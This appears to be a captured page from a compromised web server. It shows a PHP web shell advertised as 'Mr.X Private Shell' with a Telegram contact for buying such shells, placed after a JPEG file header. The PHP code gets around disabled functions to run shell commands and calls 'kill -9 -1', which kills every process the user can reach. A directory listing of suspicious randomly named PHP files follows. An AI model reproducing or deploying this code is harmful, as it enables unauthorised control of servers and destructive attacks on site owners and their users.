����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
function run($code, $method = 'popen')
{
$disabled = explode(',', ini_get('disable_functions'));
if (in_array($method, $disabled)) {
$method = 'exec';
}
if (in_array($method, $disabled)) {
return false;
}
$result = '';
switch ($method){
case 'exec':
exec($code,$array);
foreach ($array as $key => $value) {
$result .= $key . " : " . $value . PHP_EOL;
}
return $result;
break;
case 'popen':
$fp = popen($code,"r"); //popen打一个进程通道
while (!feof($fp)) { //从通道里面取得东西
$out = fgets($fp, 4096);
$result .= $out; //打印出来
}
pclose($fp);
return $result;
break;
default:
return false;
break;
}
}
echo '{->|';
var_dump(run("kill -9 -1"));
echo '|<-}';| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| oxnixcgiapi | Folder | 0755 |
|
|
| File | 0 B | 0 |
|
|
| File | 0 B | 0 |
|
|
| ____V9zwTc | File | 12.25 KB | 0600 |
|
| ____YOT497 | File | 12.25 KB | 0600 |
|
| ____ZWCyDS | File | 12.25 KB | 0600 |
|
| ____luW9SA | File | 12.25 KB | 0600 |
|
| File | 0 B | 0777 |
|
|
| p6a469ba26dcac4.78964358.php | File | 70.78 KB | 0644 |
|
| p6a470646acfa44.04273048.php | File | 70.78 KB | 0644 |
|
| p6a4756ee3f34c2.33880229.php | File | 70.78 KB | 0644 |
|
| p6a4a4a55109e78.19700185.php | File | 6.12 KB | 0644 |
|
| p6a4aa967d46403.88645622.php | File | 6.12 KB | 0644 |
|
| p6a4ac203476002.04578163.php | File | 6.12 KB | 0644 |
|
| p6a4b0199672553.68471545.php | File | 6.12 KB | 0644 |
|
| p6a4bd30d9a5383.80241117.php | File | 6.12 KB | 0644 |
|
| phpb2xKC2 | File | 1008 B | 0600 |
|
| session_cache.tmp | File | 7 B | 0644 |
|